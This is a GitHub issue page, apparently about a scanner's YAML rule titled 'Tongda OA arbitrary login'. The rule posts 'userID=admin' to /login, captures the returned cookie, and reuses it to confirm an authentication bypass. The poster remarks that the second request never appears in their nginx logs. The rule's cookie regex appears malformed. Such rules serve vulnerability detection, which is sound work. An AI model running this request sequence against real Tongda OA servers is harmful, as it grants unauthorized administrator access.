We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
name: 通达OA任意登录 manual: true sets:
rules:
The text was updated successfully, but these errors were encountered:
No branches or pull requests
name: 通达OA任意登录
manual: true
sets:
rules:
path: /login
headers:
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
body: "userID=admin"
follow_redirects: false
continue: true
search: |
Set-Cookie:(?P.*?)
path: /theme/concise
continue: true
headers:
Cookie: "{{cookie}}"
expression: |
response.body.bcontains(b"originalAlert")
规则二我看本地的nginx日志没有发送/theme/concise这个地址
The text was updated successfully, but these errors were encountered: